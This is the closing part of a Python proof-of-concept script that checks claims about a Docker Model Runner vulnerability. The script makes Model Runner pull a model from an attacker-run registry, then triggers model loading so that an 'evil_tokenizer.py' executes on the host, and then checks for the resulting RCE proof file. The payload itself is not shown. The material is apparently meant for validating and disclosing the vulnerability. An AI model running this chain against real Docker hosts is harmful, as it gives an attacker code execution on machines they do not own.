        print(f" {YELLOW}SKIP{RESET}: Model Runner not reachable (HTTP {mr_status})")
        print(f" Make sure Docker Desktop Model Runner is enabled.")
        try:
            # text=True so stderr is printed as text rather than a bytes repr.
            r = subprocess.run(["docker", "model", "list"],
                               capture_output=True, text=True, timeout=10)
            if r.returncode != 0:
                print(f" 'docker model list' failed: {r.stderr[:200]}")
                print(f" Your Docker Desktop may not support Model Runner.")
        except FileNotFoundError:
            print(f" 'docker model' command not found.")
        except subprocess.TimeoutExpired:
            print(" 'docker model list' timed out.")
        return

    print(f"\n Checking available Python backend...")
    rc, stdout, stderr = docker_run([
        "sh", "-c",
        f'curl -sf {MODEL_RUNNER_URL}/engines 2>&1 || echo ENGINES_FAIL'
    ], timeout=15)
    print(f" Available engines: {stdout[:200]}")

    # Remove proof left over from an earlier run so CHAIN-3 can only be
    # satisfied by this run. Any error other than "already absent" is left
    # to propagate: a stale proof file would be a false positive.
    for stale in [PROOF_FILE, f"{PROOF_FILE}.flag"]:
        try:
            os.remove(stale)
        except FileNotFoundError:
            pass

    # --- step 1: pull ------------------------------------------------------
    print(f"\n Step 1: pulling model from malicious registry...")
    rc, stdout, stderr = docker_run([
        "sh", "-c",
        f'curl -sf -X POST {MODEL_RUNNER_URL}/api/pull '
        f'-H "Content-Type: application/json" '
        f'-d \'{{"name": "{PULL_MODEL_NAME}"}}\' 2>&1'
    ], timeout=90)
    print(f" Response: {stdout[:300]}")
    if rc != 0:
        # `curl -sf` fails silently, so the exit code (not the output text)
        # is the only reliable failure signal; -1 means timeout/no docker.
        log_result("CHAIN-1", "Pull from malicious registry", False,
                   f"Pull failed (exit code {rc}): {stdout[:300]}")
        return
    log_result("CHAIN-1", "Model pulled from malicious registry",
               "error" not in stdout.lower(),
               f"Response: {stdout[:200]}",
               proves="Model Runner accepted the malicious model from the attacker registry.")
    status, body = http_get(f"http://{REGISTRY_HOST}:{REGISTRY_PORT}/_poc/requests")
    if status == 200:
        try:
            reqs = json.loads(body)
            blob_reqs = [req for req in reqs if "/blobs/" in req["path"]]
            manifest_reqs = [req for req in reqs if "/manifests/" in req["path"]]
        except (ValueError, KeyError, TypeError) as e:
            # Informational only; a malformed request log must not abort the chain.
            print(f" Registry request log could not be parsed: {e}")
        else:
            print(f" Registry saw: {len(manifest_reqs)} manifest + {len(blob_reqs)} blob requests")

    # --- step 2: trigger model load ---------------------------------------
    print(f"\n Step 2: triggering inference (this loads the model + evil tokenizer)...")
    print(f" Might take 30-120s if the Python backend has to start...")
    rc, stdout, stderr = docker_run([
        "sh", "-c",
        f'curl -sf --max-time 120 -X POST '
        f'{MODEL_RUNNER_URL}/engines/v1/chat/completions '
        f'-H "Content-Type: application/json" '
        f'-d \'{{"model": "{PULL_MODEL_NAME}", '
        f'"messages": [{{"role": "user", "content": "hello"}}]}}\' 2>&1'
    ], timeout=150)
    print(f" Response: {stdout[:300]}")
    # Inference may fail (model is too small, OOM, etc.) but the tokenizer
    # import happens at LOAD time, before inference starts. Check the proof.
    log_result("CHAIN-2", "Inference request sent (import happens during model load)",
               rc != -1,
               f"Response: {stdout[:200]}\n"
               "NOTE: inference failure is expected with this tiny model. The import-time "
               "code execution happens before inference runs.",
               proves="Model loading was triggered. evil_tokenizer.py gets imported "
                      "during AutoTokenizer.from_pretrained().")

    # --- step 3: look for proof -------------------------------------------
    print(f"\n Step 3: checking for RCE proof on host...")
    proof_path = Path(PROOF_FILE)
    flag_path = Path(f"{PROOF_FILE}.flag")
    # The backend might still be coming up
    for attempt in range(6):
        if proof_path.exists() or flag_path.exists():
            break
        if attempt < 5:
            time.sleep(2)
    if proof_path.exists():
        content = proof_path.read_text()
        try:
            proof = json.loads(content)
        except json.JSONDecodeError:
            proof = None
        if isinstance(proof, dict):
            log_result("CHAIN-3", "RCE CONFIRMED, arbitrary code executed on host",
                       proof.get("rce") is True,
                       json.dumps(proof, indent=2),
                       proves="A container with no special privileges got arbitrary "
                              "code execution on the Docker host via two HTTP requests.")
        else:
            # Not a JSON object: the file's existence is still evidence.
            log_result("CHAIN-3", "RCE CONFIRMED, proof file written on host",
                       len(content) > 0,
                       f"Content: {content[:500]}",
                       proves="Code executed on the host and wrote to the host filesystem.")
    elif flag_path.exists():
        log_result("CHAIN-3", "RCE CONFIRMED, flag file written on host", True,
                   f"Flag: {flag_path.read_text()}",
                   proves="Code executed on the host.")
    else:
        log_result("CHAIN-3", "RCE proof file not found on host", False,
                   f"Expected at: {PROOF_FILE}\n"
                   "Possible reasons:\n"
                   " 1. No Python backend (vllm-metal/vllm/mlx/sglang) installed\n"
                   " 2. Model loading failed before the tokenizer import\n"
                   " 3. Selected backend was llama.cpp (C++, doesn't import .py)\n"
                   " 4. Proof file path is different on this system")
# Summary
def _print_claim_rows(title, rows):
    """Print one section of the claims matrix: a title, then one line per result."""
    print(f"\n{BOLD}{title}{RESET}")
    for r in rows:
        status = {True: f"{GREEN}PROVEN{RESET}", False: f"{RED}DISPROVEN{RESET}",
                  None: f"{YELLOW}UNTESTED{RESET}"}[r["passed"]]
        print(f" {r['id']:12s} [{status}] {r['desc']}")
        if r.get("proves") and r["passed"] is True:
            print(f" -> {r['proves'][:100]}")


def print_summary():
    """Print the claims matrix and totals; return True when nothing failed.

    Results are split into runtime checks (ids starting with ``CHAIN``,
    ``2``, ``5d`` or ``6``) and static checks (everything else). A group is
    only declared "validated" if at least one of its checks actually ran;
    otherwise it is reported as not tested (and as ``null`` in the JSON
    summary), so skipping a whole group cannot read as success. With
    ``--json`` the results and summary are also dumped as JSON.

    Returns:
        bool: True if no recorded result has ``passed is False``.
    """
    runtime_prefixes = ("CHAIN", "2", "5d", "6")
    print(f"\n{'='*72}")
    print(f"{BOLD}CLAIMS MATRIX{RESET}")
    print(f"{'='*72}")
    static_tests = [r for r in results if not r["id"].startswith(runtime_prefixes)]
    runtime_tests = [r for r in results if r["id"].startswith(runtime_prefixes)]
    _print_claim_rows("Static analysis (from source code):", static_tests)
    _print_claim_rows("Runtime (live exploitation):", runtime_tests)

    passed = sum(1 for r in results if r["passed"] is True)
    failed = sum(1 for r in results if r["passed"] is False)
    skipped = sum(1 for r in results if r["passed"] is None)
    print(f"\n{'='*72}")
    print(f"{BOLD}TOTALS{RESET}")
    print(f" {GREEN}Proven: {passed}{RESET} | "
          f"{RED}Disproven: {failed}{RESET} | "
          f"{YELLOW}Untested: {skipped}{RESET} | "
          f"Total: {len(results)}")

    # all() over an empty sequence is True, so track separately whether
    # anything in each group was actually evaluated.
    static_passed = all(r["passed"] is True for r in static_tests if r["passed"] is not None)
    runtime_passed = all(r["passed"] is True for r in runtime_tests if r["passed"] is not None)
    any_static_tested = any(r["passed"] is not None for r in static_tests)
    any_runtime_tested = any(r["passed"] is not None for r in runtime_tests)
    print()
    if not any_static_tested:
        print(f" {YELLOW}Source: not tested{RESET}")
    elif static_passed:
        print(f" {GREEN}Source: all claims validated{RESET}")
        print(f" Bug exists in the codebase as described.")
    else:
        print(f" {RED}Source: some claims failed{RESET}")
        for r in static_tests:
            if r["passed"] is False:
                print(f" FAILED: {r['id']}: {r['desc']}")
    if any_runtime_tested:
        if runtime_passed:
            print(f" {GREEN}Runtime: all claims validated{RESET}")
            print(f" Attack chain works end-to-end.")
        else:
            runtime_fails = [r for r in runtime_tests if r["passed"] is False]
            runtime_ok = [r for r in runtime_tests if r["passed"] is True]
            if runtime_fails:
                print(f" {RED}Runtime: some claims failed{RESET}")
                for r in runtime_fails:
                    print(f" FAILED: {r['id']}: {r['desc']}")
            if runtime_ok:
                print(f" {GREEN}Runtime: {len(runtime_ok)} claims validated{RESET}")
    else:
        print(f" {YELLOW}Runtime: not tested{RESET}")
        print(f" Needs: Docker Desktop with Model Runner + a Python backend")
    if "--json" in sys.argv:
        print("\n--- JSON ---")
        print(json.dumps({
            "results": results,
            "summary": {
                "passed": passed, "failed": failed, "skipped": skipped,
                "static_validated": static_passed if any_static_tested else None,
                "runtime_validated": runtime_passed if any_runtime_tested else None,
            }
        }, indent=2))
    return failed == 0
def main():
    """Entry point: run the selected checks, print the summary, and exit.

    Exit status is 2 when ``REPO_ROOT`` has no ``pkg/`` directory, 0 when
    ``print_summary()`` reports no failures, and 1 otherwise.
    ``--runtime-only`` skips the static group and ``--static-only`` skips
    the runtime group.
    """
    if not (REPO_ROOT / "pkg").exists():
        print(f"ERROR: REPO_ROOT={REPO_ROOT} doesn't contain pkg/")
        print(f"Set REPO_ROOT env var to the model-runner repo root.")
        sys.exit(2)

    rule = "=" * 72
    print(f"{BOLD}{rule}")
    print(f"Docker Model Runner vulnerability claim validation")
    print(f"{rule}{RESET}")
    print(f" Repo: {REPO_ROOT}")
    print(f" Registry: {REGISTRY_HOST}:{REGISTRY_PORT}")
    print(f" Pull as: {PULL_MODEL_NAME}")
    print(f" Proof: {PROOF_FILE}")

    run_static = "--runtime-only" not in sys.argv
    run_runtime = "--static-only" not in sys.argv

    # Checks run in this order; each one records its own results.
    static_checks = (
        test_claim_1,
        test_claim_3,
        test_claim_4,
        test_claim_5,
        test_claim_7,
        test_edge_cases,
    )
    runtime_checks = (
        test_claim_2,
        test_claim_6,
        test_full_chain,
    )
    if run_static:
        for check in static_checks:
            check()
    if run_runtime:
        for check in runtime_checks:
            check()

    sys.exit(0 if print_summary() else 1)


if __name__ == "__main__":
    main()